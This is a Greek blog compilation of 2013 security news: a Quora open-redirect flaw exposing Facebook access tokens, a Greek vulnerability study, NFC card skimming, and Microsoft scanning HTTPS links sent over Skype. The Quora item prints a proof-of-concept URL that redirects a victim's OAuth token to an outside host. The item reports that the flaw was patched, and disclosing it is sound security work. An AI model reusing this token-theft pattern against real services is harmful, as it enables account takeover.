Κενό ασφάλειας στο Quora επιτρέπει την παραβίαση λογαριασμών του Facebook

O Iνδός ερευνητής ασφάλειας Prakhar Prasad ανακάλυψε μια ευπάθεια ανοιχτής ανακατεύθυνσης (Open Redirect) στο Quora, η οποία επιτρέπει την παραβίαση λογαριασμών του Facebook. Το Quora είναι μια social υπηρεσία με σκοπό την ανταλλαγή γνώσεων, όπου οι χρήστες δημιουργούν ερωτήσεις και λαμβάνουν απαντήσεις από την κοινότητα.
Το Quora επιτρέπει στους χρήστες να εγγραφούν στην υπηρεσία, μέσω του λογαριασμού τους στο Facebook. Κατά την εγγραφή ο ερευνητής παρατήρησε ότι η ιστοσελίδα είχε το δικαίωμα να λάβει το διακριτικό πρόσβασης (access token) από το OAuth του facebook, το οποίο και υπέκλεψε αξιοποιώντας ευπάθεια ανοικτής ανακατεύθυνσης. Με την χρήση του access token, ο ερευνητής μπορούσε να αποκτήσει πρόσβαση καθώς και τα πλήρη δικαιώματα σε οποιοδήποτε λογαριασμό του Facebook.
Ο κώδικας POC της ευπάθειας:
https://www.facebook.com/dialog/permissions.request?app_id=136609459636&next=https://www.quora.com/contacts/skip?goto=http://poc.prakharprasad.com/quora&response_type=token

Demo video:




Ο ερευνητής ενημέρωσε το Quora για την ευπάθεια, η οποία επιδιορθώθηκε άμεσα.

Πηγή : www.secnews.gr

Πρόσφατη Αξιολόγηση Ευπαθειών (Vulnerability Assessment) σε Ελληνικούς Φορείς και Επιχειρήσεις

Η έρευνα πραγματοποιήθηκε από το Εργαστήριο Ασφάλειας Πληροφοριακών και Επικοινωνιακών Συστημάτων του Πανεπιστημίου Αιγαίου και είχε ως στόχο τον προσδιορισμό των πιο κοινών ευπαθειών ασφάλειας που συναντώνται σε ιστοχώρους (web servers) δημοσίων φορέων και ιδιωτικών επιχειρήσεων που διατηρούν τη φυσική τους παρουσία στον ελληνικό χώρο, σε μία προσπάθεια αναβάθμισης της ασφάλειάς τους.

Για την μελέτη των συστημάτων χρησιμοποιήθηκε το εργαλείο αξιολόγησης ευπαθειών HIAB της εταιρείας Outpost24.

Κατά τη διάρκεια της μελέτης αναλύθηκαν 35 Πληροφοριακά Συστήματα 25 ελληνικών φορέων και επιχειρήσεων που εκτίθενται απευθείας στο διαδίκτυο. Πιο αναλυτικά, ελέγχθηκαν 16 συστήματα 11 δημόσιων φορέων και 19 συστήματα 14 ιδιωτικών επιχειρήσεων. Από την έρευνα προκύπτει ότι το επίπεδο της ασφάλειας είναι χαμηλό και στις δύο περιπτώσεις. Ωστόσο, ο δημόσιος τομέας φαίνεται να είναι λιγότερο εκτεθειμένος όσον αφορά τις απ’ ευθείας εξωτερικές επιθέσεις. Συγκεκριμένα, στο σύνολο εντοπίστηκαν 2180 ευπάθειες εκ των οποίων οι 581 ήταν ευπάθειες Υψηλού Κινδύνου. Όλοι οι συμμετέχοντες έλαβαν μέρος στην έρευνα οικειοθελώς και στη συνέχεια ενημερώθηκαν για τις αδυναμίες που εντοπίστηκαν στα συστήματα τους. 

Πρόθεση της έρευνας είναι τα αποτελέσματά της να λειτουργήσουν ως κίνητρο προκειμένου οι διαδικασίες Αξιολόγησης και Διαχείρισης Ευπαθειών να ενταχθούν σε μόνιμο και σταθερό πρόγραμμα από τους διαχειριστές των Πληροφοριακών Συστημάτων.

Την παρουσίαση της έρευνας μπορεί να την δει κάπιος ΕΔΩ. Και η Outpost24 μιλάει και σχολιάζει τα αποτελέσμτα  ΕΔΩ.

Έρευνα του CBC News Canada απομυθοποιεί την ασφάλεια του NFC

Πολύς λόγος έχει γίνει τον τελευταίο χρόνο για την τεχνολογία NFC, που κατά κόρων διαφημίζεται σε πάρα πολλές συσκευές Android αλλά για την οποία η Apple κρατάει μια αρνητική στάση για την ενσωμάτωση της στο iPhone και τελικά ίσως κάνει πολύ καλά.

H τεχνολογία NFC (Near Field Communications) αφορά την ασύρματη μετάδοση δεδομένων σε αποστάσεις έως 10 εκατοστά (συνήθως < 5 cm). Επιτρέπει την γρήγορη ανάγνωση/εγγραφή δεδομένων (σχετικά λίγων- ενδεικτικά 48B – 9kB) και εκλαμβάνεται ως απόδειξη φυσική παρουσίας. Επίσης, μπορεί να ενεργοποιήσει εύκολα υπηρεσίες. Αξιοποιείται μέσω κινητών συσκευών και smartphones, όπως ενδεικτικά τα Nokia 6212, C7, N9, τα Samsung Galaxy S II, ΙΙΙ, IV, (Google) Nexus S, S5230, Blackberry Bold 9900, Sagem (Mobiwire) Cosy  και πολλά ακόμη

Σύμφωνα με τον Phil Schiller της Apple η τεχνολογία NFC δεν είναι η απάντηση για όλα και δεν δίνει λύση σε όλα τα προβλήματα των χρηστών και έτσι η Apple με την εφαρμογή της Passbook βοηθάει τον χρήστη σε πράγματα που πραγματικά έχει ανάγκη!

It’s not clear that NFC is the solution to any current problem, Schiller said. “Passbook does the kinds of things customers need today.”

Σημερινή αναφορά του CBC News Canada απομυθοποιεί την ασφάλεια της τεχνολογία NFC μιας και αναφέρει πως  μπορεί ο καθένας να κλέβει εξ’ αποστάσεως τα στοιχεία πιστωτικής κάρτας που διαθέτει RFID μέσω μιας απλής και μόνο εφαρμογής.

Η εφαρμογή χρησιμοποιεί την κεραία επικοινωνίας κοντινού πεδίου (NFC) η οποία είναι ενσωματωμένη στο τηλέφωνο Galaxy SIII, ένα τεχνολογικό χαρακτηριστικό που διατίθενται σε πολλά τηλέφωνα που τρέχουν το λειτουργικό σύστημα της Google, το Android. Η κεραία συνήθως χρησιμοποιείται για να επιτρέψει σε δύο τηλέφωνα για να μιλήσουν ο ένας στον άλλο.

Ο Michael Legary (http://ca.linkedin.com/in/michaellegary) είπε ότι η εταιρεία του, Seccuris Α.Ε. (http://www.seccuris.com/), έχει ερευνήσει υποθέσεις όπου τα τηλέφωνα σε συνδυασμό με αυτές τις εφαρμογές χρησιμοποιήθηκαν για τη διάπραξη απάτης με πιστωτικές κάρτες, και είπε ότι οι πληροφορίες που διαβάζουν μπορούν να χρησιμοποιηθούν για να αγοραστεί «οτιδήποτε, από ένα ποτό του $ 1,50 από ένα μηχάνημα, μέχρι laptop αξίας $ 4.000 έως $ 5.000.»

Ο Legary είπε ότι η συγκεκριμένη εφαρμογή (app) έχει γίνει εργαλείο για το οργανωμένο έγκλημα στην Ευρώπη.

«Δεν χρειάζεται καν να σας μιλήσουν ή να σας αγγίξουν για να πάρουν πληροφορίες σχετικά με το ποιος είστε. Αυτό μπορεί να σας καταστήσει κάτι παραπάνω από στόχο για συγκεκριμένα είδη εγκλημάτων», είπε.

Αν και οι κεραίες NFC στην τρέχοντα smartphones πρέπει να είναι πολύ κοντά σε μια κάρτα, προκειμένου να δουλέψουν – όχι μακρύτερα από 10 εκατοστά – αυτό θα μπορούσε να αλλάξει με την επόμενη γενιά των Android smartphones.

Ο Legary είπε ότι το Samsung Galaxy S4, που έχει βγει στην αγορά, έχει μια πολύ πιο «ικανή» (δυνατή) κεραία NFC, κι έτσι θα μπορούσε όχι μόνο να διαβάσει τις πιστωτικές κάρτες από μεγαλύτερη απόσταση, αλλά θα μπορούσε επίσης να είναι σε θέση να διαβάσει τα πλινθία (μικτροτσίπ) που ενσωματώνονται στα αναβαθμισμένα διπλώματα οδήγησης και τα διαβατήρια.

Πηγή: greekapplenews.gr

Προσοχή στο Skype - H Microsoft διαβάζει τα πάντα που γράφεις !!

Όποιος χρησιμοποιεί το Skype έχει συναινέσει στην ανάγνωση των μηνυμάτων που στέλνει από τη Microsoft. Οι συνεργάτες του Η στη Γερμανία, στη Heise Security, ανακάλυψαν ότι η θυγατρική της Microsoft στην πραγματικότητα κάνει χρήση αυτού του προνομίου...  Λίγο μετά την αποστολή διευθύνσεων HTTPS μέσω της υπηρεσίας άμεσων μυνημάτων του Skype, οι διευθύνσεις αυτές δέχτηκαν αιφνιδιαστική επίσκεψη από τη Microsoft HQ στο Redmond.

Ένας αναγνώστης ενημέρωσε την  Heise Security ότι είχε παρατηρηθεί κάποια ασυνήθιστη κίνηση του δικτύου μετά από μια συνομιλία μέσω Skype. Ο server ανέφερε μια πιθανή επίθεση τύπου replay. Αποδείχθηκε μία διεύθυνση IP που άνηκε στη Microsoft είχε επισκεφτεί τη διεύθυνση HTTPS ΠΡΙΝ μεταδοθεί από το Skype. H Heise Security στη συνέχεια έστειλε δύο μηνύματα που περιείχαν δύο διευθύνσεις HTTPS, το ένα περιείχε στοιχεία σύνδεσης και το άλλο έδειχνε προς μία υπηρεσία file-sharing ενός ιδιωτικού cloud. Λίγες ώρες μετά την αποστολή μηνυμάτων μέσω του Skype, παρατήρηθηκαν τα ακόλουθα στο αρχείο καταγραφής του server.

65.52.100.214 - [30/Apr/2013: 19:28:32 +0200]
"HEAD / ... / Login.html; χρήστη = tbtest & password = Geheim HTTP/1.1"

 

Η πρόσβαση προέρχεται από συστήματα τα οποία ανήκουν στη Microsoft.

Πηγή : Utrace

Και στις δύο διευθύνσεις HTTPS  που μεταδόθηκαν μέσω του Skype υπήρχε επισκεψημότητα από μια IP διεύθυνση που έχει καταχωριστεί από τη Microsoft στο Redmond. Οι διευθύνσεις που δείχνουν προς κρυπτογραφημένες ιστοσελίδες συχνά περιέχουν εμπιστευτικές πληροφορίες. Αντιθέτως οι διευθύνσεις HTTP, δεν προσπελάστικαν. Κατά την επίσκεψη αυτών των σελίδων, η Microsoft έκανε χρήση τόσο των πληροφοριών σύνδεσης αλλά και της διεύθυνσης που δημιουργήθηκε ειδικά για την υπηρεσία  file-sharing του ιδιωτικό cloud.

Σε απάντηση στην έρευνα από την Heise Security, το Skype αναφέρεται σε ένα απόσπασμα από την πολιτική προστασίας δεδομένων της:

"Το Skype ίσως χρησιμοποιήσε αυτοματοποιημένη σάρωση μηνύματων και SMS (α) για τον εντοπισμό ύποπτων και ανεπιθύμητα μηνύματων και / ή (β) για να εντοπίσει τις διευθύνσεις που έχουν προηγουμένως επισημανθεί ως spam, ως fraud ή phishing."

Ένας εκπρόσωπος της εταιρείας επιβεβαίωσε ότι σαρώνει τα μηνύματα για να φιλτράρει το spam και τις ιστοσελίδες phishing. Όμως η εξήγηση αυτή δεν φαίνεται να ταιριάζει με τα γεγονότα. Οι ιστοσελίδες για phishing και Spam δεν βρίσκονται συνήθως σε HTTPS σελίδες. Αντίθετα, το Skype δεν άγγιξε τις διευθύνσεις HTTP οι οποίες είναι και οι πιο συνηθισμένες για τέτοιου είδους απειλές. Πάντως για να ελέγξει το Skype μια ιστοσελίδα αν περιέχει ιστοσελίδες με spam ή phishing, το Skype θα πρέπει να εξετάσει το περιεχόμενό τους.

Τον Ιανουάριο, ομάδες για τα δικαιώματα του πολίτη έστειλαν ανοικτήεπιστολή προς την Microsoft ερωτώντας για την ασφάλεια της επικοινωνίας του Skype. Οι ομάδες πίσω από την επιστολή, το Electronic Frontier Foundation και τους Δημοσιογράφουςχωρίς Σύνορα εξέφρασαν την ανησυχία τους για την λειτουργεία του Skype η οποία θα πρέπει να συμμορφώνονται με την νομοθεσία των ΗΠΑ για υποκλοπές και θα πρέπει να επιτραπεί σε κυβερνητικές υπηρεσίες και μυστικές υπηρεσίες να έχουν πρόσβαση στις επικοινωνίες μέσω του Skype.

Εν ολίγοις, το Η και Heise Security πιστεύουν ότι, αφού υπάρχει συναίνεση στην Microsoft να χρησιμοποιεί όλα τα δεδομένα που μεταδίδονται μέσω της υπηρεσίας, όλοι οι χρήστες του Skype θα πρέπει να υποθέτουν ότι αυτό θα συμβεί στην πραγματικότητα και ότι η εταιρεία δεν πρόκειται να αποκαλύψει τι ακριβώς συμβαίνει με αυτά τα δεδομένα.

Δες εδώ: περισσότερα από 700 online μαθήματα από τα μεγαλύτερα πανεπιστήμια του κόσμου

Ένα από τα πλέον θαυμάσια πράγματα που έχει καταφέρει το διαδίκτυο, είναι να ανοίξει τους ορίζοντές μας και να μας δίνει την ευκαιρία να αποκτήσουμε γνώση, την οποία, πολύ δύσκολα θα βρίσκαμε κατά την διάρκεια της ζωής μας και στη γεωγραφική μας περιοχή υπό άλλες συνθήκες. Τα online διαδικτυακά μαθήματα είναι κανόνας πια και αρχίζουν να τα προσφέρουν ολοένα και περισσότερα πανεπιστημιακά ιδρύματα.

Σε αυτή τη λίστα, εδώ, θα βρείτε περισσότερα από 700 δωρεάν online courses που προσφέρουν πανεπιστήμια όπως το Yale, το Stanford, το MIT και άλλα, με θεματολογία την Φυσική, τη Βιολογία, τις Πολιτικές Επιστήμες, τις Ανθρωπιστικές Σπουδές, τα Μαθηματικά, την Ιστορία, την Φωτογραφία, το Design, τον Προγραμματισμό και πολλά άλλα. Σε κάποιες από τις περιπτώσεις, θα βρείτε online υλικό από τη διδασκαλία ολόκληρων εξαμήνων, ενώ σε κάποια επίσης, θα βρείτε μέχρι και online εξετάσεις προόδου.

Κάθε θέμα και μάθημα, έχει δίπλα του τα διαθέσιμα links απ’ όπου μπορείτε να δείτε το σχετικό υλικό και να δουλέψετε πάνω σε αυτό. Η λίστα αυτή, δεν είναι γι αυτούς που αγχώνονται να πάρουν ένα πτυχίο. Είναι για εκείνους που έκανε το όνειρό τους πραγματικότητα το διαδίκτυο: όλους εκείνους που πιστεύουν πως, ανεξάρτητα από το οποιοδήποτε πτυχίο, η γνώση είναι δύναμη και η παιδεία, πρόοδος.

Κι αν ενδιαφέρεστε για τα «Ελληνικά» πράγματα, σας θυμίζουμε τα online courses που ξεκινά από τον ερχόμενο Οκτώβριο το Πανεπιστήμιο Αθηνών, εδώ.

Καλή… μάθηση.

Πηγή: www.digitallife.gr